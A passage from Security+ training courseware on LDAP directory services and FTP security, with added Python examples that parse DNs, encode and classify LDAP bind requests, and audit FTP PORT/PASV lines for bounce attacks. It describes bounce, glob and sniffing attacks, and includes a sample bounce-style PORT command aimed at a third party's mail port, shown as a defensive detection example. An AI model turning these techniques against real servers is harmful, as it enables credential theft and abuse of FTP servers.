                     protocol created by the Internet Engineering Task Force (IETF). It was originally
                     designed to work as a front-end client for X.500 directory services (an ISO and ITU
                     standard that defines how global directories should be structured). X.500 requires the
                     full OSI protocol stack and significant computer resources to operate. In response,
                     LDAP was redesigned as a stripped-down version of X.500.
                     LDAP offers the following features:
                            • Hierarchical database structure follows X.500 standards
                            • Extensible for use with any X.500-compatible database
                            • Provides authentication and authorization services
                            • Easily deploys on any client or server
                            • Runs over TCP/IP networks
                            • Supports most operating systems (platform-independent)
                     LDAP’s key advantage is that it’s a versatile directory system that is standards-based
                     and platform-independent. This has caused LDAP to proliferate to nearly all operating
                     systems and has caused the protocol to be widely adopted for a variety of networking
                     applications (see the following table for a sample of major players in the LDAP
                     market). This protocol runs on TCP/IP, so it can be deployed on most networks.
                                                   Directory and file transfer services   7–3

 Vendor            Product

 Microsoft         Active Directory

 Sun               ONE Integration Server (formerly Netscape iPlanet)

 IBM               Directory Server

 Novell            eDirectory

 MessagingDirect   M-Vault

 Open source       OpenLDAP




Authentication and authorization
As more and more applications have been deployed on the network to support critical
business functions, there has been an increasing need to authenticate users to secure
those applications. Today’s networks typically have a host of operating systems and a
matching number of different applications. LDAP synchronizes usernames and
passwords across operating platforms and applications, enabling access to network
resources with a single login sequence.
A few common applications of LDAP include:
    • Single sign-on (SSO) — SSO is an authentication process in a client/server
      environment where a user can enter a single username and password and obtain
      access to more than one application or network resource.
    • User administration — A major problem for enterprises is the costly task (in
      terms of system administrator time) of maintaining user accounts. Maintenance
      activities include the creation and deletion of accounts, as well as adding and
      removing user privileges (such as when a user moves to another department).
      LDAP’s flexibility simplifies this process because administrators have only one
      user database to manage, and it handles authentication and authorization for all
      major applications.
    • Public key infrastructure (PKI) — PKI is a system for creating and managing
      certificates used for authentication and encryption. A basic requirement for PKI
      is the maintenance of user certificates, which is often accomplished using
      LDAP. A user certificate contains a user’s public key together with additional
      identifying data. This certificate is created and authenticated by a certificate
      authority (CA) that guarantees the certificate is valid (the user’s identity has
      been validated), provided it has not been revoked. Most CAs support the
      delivery of certificates to LDAP-based directory systems.

                 LDAP framework
                 An LDAP directory follows the X.500 hierarchical tree format as shown in Exhibit 7-1.
                 The diagram portrays an inverted tree, with its root at the top and branches extending
                 out from the root. The branches are classified as containers since their sole purpose is to
                 hold or contain other objects. The most elemental units are called leaf objects. Each leaf
                 on the tree describes a single network resource, such as a computer, printer, user, or file
                 system directory.




                 Exhibit 7-1: Directory information tree

The following table describes each level of the tree structure:

 Level                           Description

 [Root]                          At the top of this inverted tree is the [Root]. Like the root of the
                                 file directory tree, this is the highest level you can go within the
                                 LDAP structure. The [Root] is created during installation of the
                                 first LDAP server on the network and cannot be moved, deleted,
                                 or renamed. The Directory tree can have only one [Root].

 Country                         The Country object, an optional object representing the country
                                 of the network, is positioned directly beneath the [Root] object.

 Organization                    The next level contains an object called the Organization. The
                                 Organization is classified as a “container,” since its sole purpose
                                 is to hold or contain other objects. Organizations typically
                                 represent a company or department and are used to store other
                                 objects. Every tree must have at least one Organization.

 Organizational Unit             Beneath the Organization is another container called the
                                 Organizational Unit. Organizational Units typically represent a
                                 division, department, workgroup, or project team, and can
                                 contain other Organizational Units or leaf objects.
                                 Organizational Units are optional in the LDAP hierarchy.

 Leaf Objects                    Leaf objects are the most elemental unit in the LDAP tree. Each
                                 leaf on the tree describes a single network resource. The
                                 Directory tree represents each leaf object with an icon that
                                 shows what type of resource it is and how it is named.


Each entry in the directory has a distinguished name (DN) and its own attributes
followed by specific values. Each distinguished name must be unique throughout the
LDAP directory because it identifies a single network object.
An example of the DN of an entry (an individual) stored in an LDAP directory is:
     cn=Jonathan Q Public, ou=Information Security Department,
     o=XYZ Corp, c=United States
Using the following table, you can decode the fields in the DN. Jonathan Q Public is the
common name of the individual who works in the Information Security Department of
XYZ Corp., which is headquartered in the United States.

 Abbreviation          Description

 DN                    Distinguished name

 CN                    Common name

 OU                    Organizational unit

 O                     Organization

 C                     Country
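As an added Python example (not code from the manual), the following parses and rebuilds DN strings using the RFC 4514 escaping rules, decodes the fields with the abbreviation table above, and normalizes DNs for the uniqueness rule described earlier. It deliberately tolerates the spacing used in the manual's own DN examples ("cn= X, ou=Y"), which strict RFC 4514 producers would escape instead.

```python
from __future__ import annotations

# Characters that must be backslash-escaped inside a DN value (RFC 4514).
SPECIALS = set(',+"\\<>;')

# The manual's abbreviation table, used to decode a DN for a reader.
ABBREVIATIONS = {"cn": "Common name", "ou": "Organizational unit",
                 "o": "Organization", "c": "Country"}


def parse_dn(dn: str) -> list[list[tuple[str, str]]]:
    """Split a DN string into RDNs, most specific first as written.

    Each RDN is a list of (attribute type, value) pairs ('+' joins the pairs
    of a multi-valued RDN).  Backslash escapes such as '\\,' and hex pairs
    such as '\\C3\\A9' are decoded.  Whitespace around types and values is
    tolerated, so "cn= X, ou=Y" parses like "cn=X,ou=Y"."""
    if not dn.strip():
        return []                      # the empty DN names the root DSE
    rdns: list[list[tuple[str, str]]] = []
    rdn: list[tuple[str, str]] = []
    attr: list[str] = []
    value = bytearray()                # bytes, so hex escapes can form UTF-8
    in_value = False
    i = 0
    while i < len(dn):
        ch = dn[i]
        if in_value and ch == "\\":
            nxt = dn[i + 1:i + 2]
            if not nxt:
                raise ValueError("dangling escape in %r" % dn)
            if nxt in SPECIALS or nxt in " #=":
                value.append(ord(nxt))
                i += 2
            else:                      # hex pair: one raw UTF-8 byte
                value.append(int(dn[i + 1:i + 3], 16))
                i += 3
            continue
        if not in_value and ch == "=":
            in_value = True
        elif in_value and ch in ",+":
            rdn.append(_finish(dn, attr, value))
            attr, value, in_value = [], bytearray(), False
            if ch == ",":
                rdns.append(rdn)
                rdn = []
        elif in_value and ch in SPECIALS:
            raise ValueError("unescaped %r in %r" % (ch, dn))
        elif in_value:
            value.extend(ch.encode("utf-8"))
        else:
            attr.append(ch)
        i += 1
    if not in_value:
        raise ValueError("RDN without '=' in %r" % dn)
    rdn.append(_finish(dn, attr, value))
    rdns.append(rdn)
    return rdns


def _finish(dn: str, attr: list[str], value: bytearray) -> tuple[str, str]:
    atype = "".join(attr).strip().lower()
    if not atype:
        raise ValueError("empty attribute type in %r" % dn)
    return atype, value.decode("utf-8").strip()


def escape_value(value: str) -> str:
    """Escape one value for a DN string: specials, a leading '#' or space,
    and a trailing space get a backslash (RFC 4514 section 2.4)."""
    out = "".join("\\" + c if c in SPECIALS else c for c in value)
    if out[:1] in (" ", "#"):
        out = "\\" + out
    if out.endswith(" "):
        out = out[:-1] + "\\ "
    return out


def build_dn(rdns: list[list[tuple[str, str]]]) -> str:
    """Inverse of parse_dn: render RDNs back into one DN string."""
    return ",".join("+".join(f"{t}={escape_value(v)}" for t, v in rdn)
                    for rdn in rdns)


def describe_dn(dn: str) -> list[tuple[str, str]]:
    """Decode a DN field by field with the abbreviation table, e.g.
    [('Common name', 'Jonathan Q Public'), ('Organizational unit', ...)]."""
    return [(ABBREVIATIONS.get(t, t), v)
            for rdn in parse_dn(dn) for t, v in rdn]


def normalize_dn(dn: str) -> str:
    """Canonical form for the uniqueness rule: cn, ou, o and c all use
    caseIgnoreMatch, so case and runs of whitespace do not make two DNs
    different, and a directory must not hold two entries whose
    normalized DNs are equal."""
    return build_dn([[(t, " ".join(v.lower().split())) for t, v in rdn]
                     for rdn in parse_dn(dn)])
```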

                 LDAP security benefits
                 Some key benefits of LDAP are that it provides authentication of users to ensure their
                 identities, authorization services to determine which network resources the user might
                 access, and finally, encryption for secure communications. LDAP offers encryption by
                 utilizing other protocols through a standards-based interface called Simple
                 Authentication and Security Layer (SASL).

                 Authentication
                 To access the LDAP directory service, the LDAP client must authenticate itself to the
                 LDAP server. LDAP uses the bind operation to provide this authentication when the
                 client attempts to establish a connection with a server.
                 Three levels of authentication are provided by LDAP:
                     • No authentication — This mode is used if the directory is publicly published
                       information and there is no need to restrict access. An example of such a
                       directory might be the business white pages that list the telephone numbers of all
                       businesses in the Phoenix metropolitan area.
                     • Simple authentication — Simple mode passes the authentication information
                       across the network in clear text. This clear security risk can be mitigated if
                       encryption is provided by a lower-level protocol such as IPSec.
                     • SASL — This standards-based scheme launches one of several security methods
                       to add encryption to connection-oriented protocols. SASL leverages a variety of
                       methods including TLS and IPSec. When LDAP authentication is used in SASL
                       mode, any method of encryption included in the SASL framework might be used
                       to secure the user authentication operation. TLS/SSL is the most commonly used
                       method with LDAP 3.
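The following is an added Python example, not code from the manual: it BER-encodes an LDAPv3 BindRequest as defined in RFC 4511 for each of the authentication levels above, decodes a message back, and flags a simple bind on a session that is not encrypted, which is the clear-text exposure the list describes. The DN, password and encrypted/unencrypted flag are constructed sample values; no directory server is contacted.

```python
from typing import Optional

# BER tags for the parts of an LDAPv3 BindRequest (RFC 4511 section 4.2).
TAG_SEQUENCE = 0x30
TAG_INTEGER = 0x02
TAG_OCTET_STRING = 0x04
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0], constructed
TAG_AUTH_SIMPLE = 0x80    # authentication CHOICE: simple [0] OCTET STRING
TAG_AUTH_SASL = 0xA3      # authentication CHOICE: sasl [3] SaslCredentials


def ber_length(n: int) -> bytes:
    """Definite-length form: one byte below 128, length-of-length above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + ber_length(len(value)) + value


def ber_integer(n: int) -> bytes:
    size = max(1, (n.bit_length() + 8) // 8)   # room for the sign bit
    return tlv(TAG_INTEGER, n.to_bytes(size, "big", signed=True))


def bind_request(msg_id: int, name: str, password: str = "",
                 sasl_mechanism: Optional[str] = None,
                 sasl_credentials: bytes = b"") -> bytes:
    """Encode an LDAPMessage carrying a BindRequest.  Without a mechanism this
    is a simple bind (empty name and password: anonymous); with one, SASL."""
    if sasl_mechanism is None:
        auth = tlv(TAG_AUTH_SIMPLE, password.encode("utf-8"))
    else:
        creds = tlv(TAG_OCTET_STRING, sasl_mechanism.encode("utf-8"))
        if sasl_credentials:
            creds += tlv(TAG_OCTET_STRING, sasl_credentials)
        auth = tlv(TAG_AUTH_SASL, creds)
    op = ber_integer(3) + tlv(TAG_OCTET_STRING, name.encode("utf-8")) + auth
    return tlv(TAG_SEQUENCE, ber_integer(msg_id) + tlv(TAG_BIND_REQUEST, op))


def read_tlv(buf: bytes, pos: int):
    """Return (tag, contents, position just after the element)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                          # long form
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:end], end


def classify_bind(message: bytes) -> dict:
    """Decode a captured LDAPMessage and report which authentication level
    the bind uses: anonymous, unauthenticated, simple or sasl."""
    tag, body, _ = read_tlv(message, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an LDAPMessage")
    _, msg_id, pos = read_tlv(body, 0)
    op_tag, op, _ = read_tlv(body, pos)
    info = {"message_id": int.from_bytes(msg_id, "big", signed=True)}
    if op_tag != TAG_BIND_REQUEST:
        info["level"] = "not a bind"
        return info
    _, version, pos = read_tlv(op, 0)
    _, name, pos = read_tlv(op, pos)
    auth_tag, auth, _ = read_tlv(op, pos)
    info["version"] = int.from_bytes(version, "big", signed=True)
    info["name"] = name.decode("utf-8")
    if auth_tag == TAG_AUTH_SIMPLE:
        if not name and not auth:
            info["level"] = "anonymous"
        elif not auth:                         # RFC 4513 "unauthenticated"
            info["level"] = "unauthenticated"
        else:
            info["level"] = "simple"
            info["password"] = auth.decode("utf-8", errors="replace")
    elif auth_tag == TAG_AUTH_SASL:
        _, mechanism, _ = read_tlv(auth, 0)
        info["level"] = "sasl"
        info["mechanism"] = mechanism.decode("utf-8")
    else:
        info["level"] = "unknown"
    return info


def bind_exposure(message: bytes, session_encrypted: bool) -> Optional[str]:
    """Defender's check: a simple bind on a session not protected by TLS
    (LDAPS or STARTTLS) or IPsec carries the password in clear text."""
    info = classify_bind(message)
    if info["level"] == "simple" and not session_encrypted:
        return "cleartext password for %r visible to a packet sniffer" % info["name"]
    return None
```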

                 Authorization
                 After a client has been authenticated and his or her identity has been established, the
                 LDAP server can determine what resources, applications, and services the user is
                 permitted to access. This is called authorization, or access control, and is determined by
                 access control lists (ACLs). For example, ACLs can be entries that state whether a given
                 user has permission to read, write, add, or delete when accessing specific resources.
                 There are no standards for implementing ACLs; each vendor of LDAP products
                 implements ACLs in its own way.

                 Encryption
                 As was noted in the discussion of SASL, most LDAP servers allow their services to be
                 accessed via TLS and SSL. Generally, secure LDAP (LDAPS) servers use port 636 as a
                 standard SSL/TLS socket number. Directory servers can also support custom sockets,
                 but to do so, the client has to identify the appropriate socket to access the directory
                 services on the server through SSL.

LDAP security vulnerabilities
Like any directory service, LDAP is a prime target for attacks and tampering. As a
consolidated and unified source of user authentication information (as is the case when
an entire enterprise becomes directory enabled), the LDAP server represents a much
more valuable and hence risk-prone asset compared to other directory servers. This is
because user information previously might have been stored in a variety of locations on
the network, and each location allowed access to only a subset of network resources.
When that information is all brought together in one place, it’s easier to secure—but the
penalties for failing to secure it properly are much higher because a successful attacker
can do much more damage.
The following are some major types of attacks LDAP servers must be secured against:
    • Denial of service — Attacks against an enterprise’s directory server can have
      massive ramifications. Mission-critical applications that rely upon the LDAP
      server for authentication might become unavailable until service is restored.
    • Man-in-the-middle — By tricking a client into authenticating to a bogus server,
      an attacker can gather valuable account information or feed the client false data.
    • Attacks against data confidentiality — The directory information contained in
      the LDAP server is extremely important, so efforts to ensure the directory is
      confidential are critical. Even if LDAP network traffic is encrypted, there are a
      multitude of attacks and exploits that an attacker can use to gain access to an
      LDAP server and the data it contains.

Countermeasures
Extra steps must be taken to secure the LDAP server, including:
    • Apply the latest operating system and application security patches.
    • Remove unneeded services and applications that could potentially present an
      exploitable vulnerability.
    • Configure strong authentication using Kerberos for LDAP v2 or SASL for
      LDAP v3.
    • Block LDAP (typically, TCP/UDP ports 389 and 636) at the firewall.

Do it!              A-1:      Understanding directory services
                      Questions and answers
                       1 Information gathered for each network resource is stored as a(n) _________ in the
                         database.
                          A      leaf
                          B      object
                          C      container
                          D      query

                       2 Name three functions that a directory service performs.
                          • Records and organizes information about every user account, server, printer,
                              workstation, and file system on the network.
                          • Grants users access to applications, files, printers, and other network services anywhere
                              on the network with a single login sequence.
                          • Enables the LAN Administrator to track the location and disposition of all network
                              resources.

                       3 LDAP stands for _________________________________.

                          Lightweight Directory Access Protocol

                       4 Name two similarities between X.500 and LDAP.
                          • Both use the same hierarchical database structure and standards.
                          • Both provide authentication and authorization services.
                          • Both are platform-independent.

                       5 Name two differences between X.500 and LDAP.
                          • LDAP runs on TCP/IP; X.500 requires the full OSI protocol stack.
                          • LDAP requires far fewer computer resources.
                          • LDAP is easier to install than X.500.

                       6 Provide the distinguished name for the following leaf object:

                          Company: Emerald Consulting
                          Department: Information Services
                          Volume: UNIX401_SYSTEM

                          cn=UNIX401_SYSTEM, ou=Information Services, o=Emerald Consulting

                       7 SSO is an authentication process in a client/server environment where a user can
                         enter a single username and password and obtain access to more than one
                         application or network resource. True or false?

                          True

8 What are some major types of attacks LDAP servers must be secured against?
  (Choose all that apply.)
  A   Man-in-the-middle
  B   Denial of service
  C   Attacks against data confidentiality
  D   Encryption


Topic B: File transfer services
                     This topic covers the following CompTIA Security+ exam objective:

                      #      Objective

                      2.5    Recognize and understand the administration of the following file transfer protocols and
                             concepts
                              • S/FTP (File Transfer Protocol)
                              • Blind FTP (File Transfer protocol) / Anonymous
                              • Vulnerabilities
                                  • Packet Sniffing




                     FTP
Explanation          It is obvious to most people who have downloaded files over the Internet that the ability
                     to share programs and data with other people around the world is an essential aspect of
                     the Internet that continues to drive its explosive growth. This is why file transfer is so
                     critical to today’s networked organizations. An often-overlooked aspect of this is the
                     security and integrity of the typically secret data that businesses need to exchange over
                     the Internet. As incredible and wonderful as the Internet might be, it’s a wild and
                     uncontrolled network and poses a number of risks to your business’s data.
                     One of the most commonly used application protocols on the Internet is File Transfer
                     Protocol (FTP). It’s also one of the most insecure services in use. The reason it is so
                     commonly used is that most FTP clients and servers are free, distributed with most
                     operating systems, and relatively easy to use. System administrators can easily exchange
                     files with remote offices and business partners over the Internet by setting up an FTP
                     server in a matter of minutes and with no additional cost. The list of vulnerabilities and
                     attacks associated with FTP is a long one.
                     FTP was one of the early TCP/IP applications and was designed without the security
                     features of many current applications. To understand FTP’s inherent flaws, one must
                     first understand the mechanism by which FTP authenticates and transfers data between
                     a client and a server. FTP has two standard data transmission methods: active FTP and
                     passive FTP. The terms “active” and “passive” refer to the server’s role in setting up the
                     TCP session, as shown in Exhibit 7-2.




                     Exhibit 7-2: Setup of the FTP command connection

In both active and passive FTP, the client initiates a TCP session using destination port
21 to the server. This is the command connection and is used for authenticating the user
and transferring commands between the client and the server. The command connection
operates just as a normal TCP session should: the client initiates a session using a
predetermined destination port number on the server (for FTP, this is port 21), and a
source port that is a number greater than 1023.
The differences in how the two types of FTP operate are in the data connection that is
set up when the user wants to transfer data between the two machines. For example, if
the user issued FTP’s GET command to download a file (the command might take the
form get resume.doc to download the file resume.doc), the client sends the get
command using the command connection, and then the server negotiates the opening of
a second TCP connection to actually transfer the file’s data.

Active FTP
In active FTP, which is FTP’s default operation, the FTP server creates a data
connection by opening a TCP session using a source port of 20 and a destination port
greater than 1023. This is contrary to TCP’s normal operation in which the destination
port of a new session is fixed and the source port is a random high port above 1023.
Active FTP is an issue because security best practices dictate that connections can be
initiated outbound from a trusted network to an untrusted network, but not vice versa. In
a situation in which the client sits behind a firewall of an internal trusted network and
the server is out on the Internet, active FTP breaks this policy. Active FTP requires that
the server initiate a connection inbound to the client to transfer data, as shown in Exhibit
7-3.




Exhibit 7-3: Setup of active FTP data connection

Most modern stateful firewalls accommodate this issue by actually watching the
negotiation between the client and server and automatically opening the agreed upon
port so the client can receive the connection from the server. Simple packet-filtering
firewalls do not have this level of intelligence. To permit active FTP using packet-
filtering firewalls, one must allow all high ports (because one never knows what port
will be negotiated by the client and server) to reach internal clients from outside the
trusted network—a very dangerous proposition. The situation can be slightly mitigated
by only allowing incoming connections from port 20. People seeking to exploit this
weakness could easily craft packets from that port as well.

                  Passive FTP
                  In passive FTP, which is not supported by all FTP implementations, the client initiates
                  the data connection to the server (therefore, the server is said to be passive because it’s
                  only accepting a connection instead of originating one). As shown in Exhibit 7-4, the
                  passive FTP client initiates the data connection to the server with a source and
                  destination port that are both random high ports.




                  Exhibit 7-4: Setup of the passive FTP data connection

                  This solves the firewall issue just mentioned, because the client initiates both
                  connections, so the client does not violate its own security policy by allowing an
                  inbound connection from the Internet. This opens up a security issue for the FTP server:
                  now the server must allow inbound connections on all high ports in order to
                  accommodate passive FTP data connections. Most stateful firewalls accommodate this
                  by monitoring the control connection to determine which port is used for the data
                  connection, and then opening that single port between the server and the client. The
                  same issue exists for packet-filtering firewalls, which are not equipped to look that
                  deeply into the FTP packet; a packet-filtering firewall that is protecting the FTP
                  server has to be configured to accept all ports to the server in order to accommodate
                  passive FTP.

                  FTP security issues
                  Some of the better-known FTP security issues are outlined in the following sections.

                  Bounce attack
                  The Bounce attack uses the fact that RFC 959, the standards document outlining FTP,
                  gives the active FTP client the power to cause the FTP server to open a data connection
                  to any IP address on any port. This can be used to anonymously attack other systems on
                  the Internet.
                  RFC 2577, FTP Security Considerations, outlines an example of such an attack. For
                  instance, a client uploads a file containing SMTP commands to an FTP server. Then,
                  using an appropriate PORT command, the client instructs the server to open a
                  connection to a third machine’s SMTP port. Finally, the client instructs the server to
                  transfer the uploaded file containing SMTP commands to the third machine. This might
                  allow the client to forge mail on the third machine without making a direct connection,
                  and makes it difficult to track attackers.
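As an added Python example (not the manual's code), the following models what a stateful firewall does with the PORT command and the 227 reply described under active and passive FTP, and applies the server-side mitigation for the bounce attack from RFC 2577: a PORT command naming an address other than the control connection's own client, or a privileged port, is rejected. The session, addresses and ports are constructed sample data.

```python
from __future__ import annotations
import re
from typing import Optional

# "h1,h2,h3,h4,p1,p2" as carried by the client's PORT command (RFC 959) and by
# the server's "227 Entering Passive Mode" reply; the port is p1 * 256 + p2.
_HOSTPORT = r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})"
PORT_RE = re.compile(r"^PORT\s+" + _HOSTPORT + r"\s*$", re.IGNORECASE)
PASV_RE = re.compile(r"^227\b.*?\(" + _HOSTPORT + r"\)")
FTP_DATA_PORT = 20


def decode_hostport(groups) -> tuple[str, int]:
    """Turn the six captured decimal fields into ('a.b.c.d', port)."""
    nums = [int(g) for g in groups]
    if any(n > 255 for n in nums):
        raise ValueError("field out of range in %r" % (groups,))
    return ".".join(map(str, nums[:4])), nums[4] * 256 + nums[5]


def inspect_line(sender: str, line: str, client_ip: str,
                 server_ip: str) -> Optional[dict]:
    """Examine one control-connection line from 'client' or 'server'.

    Returns None for lines that do not negotiate a data connection; otherwise a
    finding with the mode, the data connection's endpoints (the single pinhole
    a stateful firewall would open) and an allow/reject verdict."""
    m = PORT_RE.match(line) if sender == "client" else PASV_RE.match(line)
    if not m:
        return None
    host, port = decode_hostport(m.groups())
    if sender == "client":
        # Active mode: the server connects from port 20 *inbound* to the
        # address the client announced, the direction firewalls dislike.
        finding = {"mode": "active", "data_from": (server_ip, FTP_DATA_PORT),
                   "data_to": (host, port), "inbound_to": "client"}
        expected_host, role = client_ip, "client"
    else:
        # Passive mode: the client connects out to the high port the server
        # named, so the server side must accept an inbound high-port session.
        finding = {"mode": "passive", "data_from": (client_ip, "high port"),
                   "data_to": (host, port), "inbound_to": "server"}
        expected_host, role = server_ip, "server"
    problems = []
    if host != expected_host:
        # RFC 2577 section 3: a PORT naming a third party is the bounce
        # attack; a 227 naming another host is at best a NAT misconfiguration.
        problems.append("address %s is not the %s (%s)"
                        % (host, role, expected_host))
    if port < 1024:
        # RFC 2577 also recommends refusing data connections to well-known
        # ports, which is where a bounced payload would be aimed.
        problems.append("port %d is a privileged port" % port)
    finding["verdict"] = ("allow" if not problems
                          else "reject: " + "; ".join(problems))
    return finding


def audit_session(lines, client_ip: str, server_ip: str) -> list[dict]:
    """Run inspect_line over (sender, line) pairs and collect the findings."""
    findings = []
    for sender, line in lines:
        finding = inspect_line(sender, line, client_ip, server_ip)
        if finding is not None:
            finding["line"] = line
            findings.append(finding)
    return findings


# Constructed sample exchange (not a real capture).  The client is 10.1.1.5
# behind the firewall; the server is 198.51.100.7 out on the Internet.
SAMPLE_SESSION = [
    ("server", "220 example FTP server ready."),
    ("client", "USER anonymous"),
    ("server", "331 Guest login ok, send your complete e-mail address as password."),
    ("client", "PORT 10,1,1,5,4,1"),                # active: 10.1.1.5:1025
    ("client", "RETR resume.doc"),
    ("client", "PORT 203,0,113,9,0,25"),            # third party, port 25
    ("server", "227 Entering Passive Mode (198,51,100,7,195,80)"),  # port 50000
    ("client", "RETR README"),
]

if __name__ == "__main__":
    for f in audit_session(SAMPLE_SESSION, "10.1.1.5", "198.51.100.7"):
        print(f["mode"], f["data_from"], "->", f["data_to"], "|", f["verdict"])
```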

Clear text authentication and data transmission
Another vulnerability lies in the fact that FTP traffic is sent unencrypted in clear text.
This includes both the username/password pair and the data itself. Anyone with a packet
sniffer can own a copy of the data transferred via FTP, as well as the login information
used to obtain it.

Glob vulnerability
A nonstandard issue with many FTP implementations is that they permit the client to
use the (*) wildcard in FTP commands. The wildcard is a very useful tool that allows a
user to perform an operation on multiple files at once.
For example, the command del ap* causes the files application.doc and apple.pic to
be deleted. Hackers can exploit this behavior to create buffer overflows and therefore
gain control of the server. This is called the glob vulnerability.

Software exploits and buffer overflow vulnerabilities
There are many known vulnerabilities associated with various implementations of FTP.
For example, a well-documented buffer overflow vulnerability in wu-ftp (a common
FTP server implementation) has been responsible for thousands of compromised UNIX
and Linux boxes.

Anonymous FTP and blind FTP access
The practice of setting up anonymous FTP servers across the Internet is extremely
common. This originates with an FTP server’s default position of allowing anyone
authenticating with the username “anonymous” and any password (good Netizens use
their e-mail address as a password) access to a directory on the server. This practice
allowed people around the world to easily share data and files with the world without
too much overhead or red tape. Many software vendors set up anonymous FTP sites to
distribute updates and patches for their products. FTP search engines exist that make
finding thousands of anonymous FTP sites quick and easy.
The transcript below is from an anonymous FTP session. Information entered by the
user appears in bold typeface:
    C:\ >ftp leech.stat.umn.edu
    Connected to leech.stat.umn.edu.
    220 leech.stat.umn.edu FTP server (Version wu-2.4.2-academ[BETA-18](1) Thu Sep 2 GMT 2001) ready.
    User (leech.stat.umn.edu:(none)): anonymous
    331 Guest login ok, send your complete e-mail address as password.
    Password:
    230-Please read the file README
    230- it was last modified on Fri Dec 13 14:14:31 1996 - 2024 days ago
    230 Guest login ok, access restrictions apply.
    ftp>
In the first line of this transcript, the user issued a command to run the FTP client and
connect to the site called leech.stat.umn.edu. The user could just as easily have
entered the server’s IP address. In the second line, you see the connection was
successful, and in the following line, the FTP server has provided some basic
information about itself. It’s running version 2.4.2 of wu-ftp. The server immediately
provides the User prompt so the user can log on to it.

                  Here you see the user provided the login of “anonymous” to get access with visitor
                  privileges. The server has been configured to accept the anonymous login account; it
                  requests the user provide his or her e-mail address as a password, although any string of
                  characters is often accepted by anonymous FTP servers. After the password was
                  entered, the server prints a brief banner message instructing the guest to read the file
                  README. You know the anonymous user credentials were accepted, because the
                  server noted “Guest login ok.” Finally, you see the ftp> prompt, indicating the user is
                  now able to enter an FTP command.
                  Although properly secured and monitored anonymous FTP sites are a valuable and well-
                  used Internet resource, unmonitored anonymous FTP servers can often be used as
                  storehouses for “warez” (pirated software with the copy protection mechanisms
                  removed). Pirates use anonymous FTP sites for storage because they often have more
                  bandwidth than their own Internet connections, making it easy to share and trade their
                  warez. Companies that do not monitor their anonymous FTP sites for this type of
                  behavior risk a black eye in the public relations arena if it becomes known that their
                  servers are used for this type of illegal activity.
                  A potentially worse situation could arise if the anonymous account is not properly
                  restricted to access only designated directories. If an anonymous FTP server is
                  misconfigured and permits anonymous visitors to write to any directory, then malicious
                  visitors could upload files that would result in their gaining root access and control of
                  the server. Even if the malicious user could only read any directory, then he could
                  download files containing user passwords and decrypt them using password cracking
                  tools.
                  If you decide to set up an anonymous FTP server, be sure it’s properly secured. CERT
                  provides a document entitled “Anonymous FTP Configuration Guidelines” to help in
                  this task. It is available at:
                     www.cert.org/tech_tips/anonymous_ftp_config.html.
                  A variant of the anonymous FTP site is a “blind” FTP site. With blind FTP sites, a user
                  logs on as anonymous, but is then restricted to a single directory and is not able to
                  obtain a listing of files in the directory. Blind FTP sites offer more security than
                  anonymous sites, because the user must know the exact filename of a desired file in
                  order to download it. There is still no way to account for who has logged on to the
                  server and accessed a given file. If a user who is given a particular filename by an
                  administrator chooses to share it with others, then the privacy sought by setting up the
                  blind server is compromised.

FTP countermeasures
It’s clear from the aforementioned issues that FTP is an easy target for hackers. There
are, however, solutions to the FTP quandary:
    • Do not allow anonymous access unless a clear business requirement exists to do
      so.
    • Employ a state-of-the-art firewall such as a Cisco PIX or Check Point FireWall-1
      that performs content inspection of FTP commands.
    • Ensure your FTP server has the latest security patches and that it has been
      properly configured to limit user access.
    • Encrypt your data before placing it on an FTP server, so it cannot be sniffed in
      transit to its destination. The recipient needs the appropriate keys to decrypt the
      data once it has been received.
    • Encrypt the FTP data flow using a Virtual Private Network (VPN) connection.
    • Switch to a secure alternative to FTP, such as the Secure File Transfer Protocol
      outlined in the next section.

Do it!                        B-1:   Creating a new FTP site
Students will work in pairs for this activity.
                               Here’s how                             Here’s why
                               1 Log on to your server as             (If necessary.) This activity requires that you
                                 administrator                        pair up with a partner. On each server, you and
                                                                      your partner will create an ftp site and test its
                                                                      connection.

                               2 Create a folder called ftp located
                                 in the root directory of your
                                 system

                               3 Click Start and then right click
                                 My Computer

                                 Choose Manage                        The Computer Management window appears.

                               4 Expand Services and
                                 Applications

                               5 Expand Internet
                                 Information Services

                               6 Expand FTP Sites




                               7 Right-click FTP Sites

                                 Choose New, FTP Site…                The FTP Site Creation Wizard will begin.

                               8 Click Next

                               9 Enter My FTP Site                    For the description.

                                 Click Next

                              10 Click Next                           To keep the default settings for the IP Address
                                                                      and TCP Port Settings.

                              11 Click Next                           To accept the default of not isolating users.

                              12 In the path box, type c:\ftp         If your root directory is different than c:\,
                                                                      substitute the root directory on your system.

                              13 Click Next                           The FTP Site Access Permissions screen
                                                                      appears.

                              14 Check Write

                                 Click Next
                                     Directory and file transfer services     7–17

15 Click Finish                   (To close the Wizard.) Notice that your ftp site
                                  is stopped. To start your ftp server, you’ll have
                                  to first stop the Default FTP Site

16 Right-click Default FTP site   In Computer Management.

   Choose Stop

17 Right-click My FTP site
   (Stopped)

   Choose Start

18 Click Start and then choose    To open a Command window. You will try
   Run                            logging onto your partner’s FTP site.

   Type cmd and press e

19 At the command prompt, enter
   ftp

20 At the ftp prompt, type
   open <your partner’s IP address>

   Press e

21 Enter anonymous                As the user.

22 Enter password                 As the password. You will be connected.

23 Enter quit                     To end the ftp session.

                         Requiring authentication
Explanation              The default setting for an FTP site is to allow anonymous access; however, there are
                         times when it’s necessary to control access. The Windows Server 2003 FTP Server
                         service has capabilities to remove anonymous access and require user authentication.
                         The major risk when switching to authentication is that the usernames and passwords
                         are sent in clear text, which can be sniffed with a protocol analyzer.
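The risk described above can be made concrete by looking at what a protocol analyzer on the same segment actually sees. The following added example (it is not part of the course material) parses a constructed control-channel capture, reduced to one text line per segment in the form `<src>:<port> -> <dst>:<port> <payload>`, and reports every USER/PASS pair together with the server's verdict. The addresses, port numbers and reply wording are constructed for the demonstration; the detector deliberately records only the length of each observed password, never its value.

```python
"""Flag clear-text FTP logins in a decoded control-channel capture.

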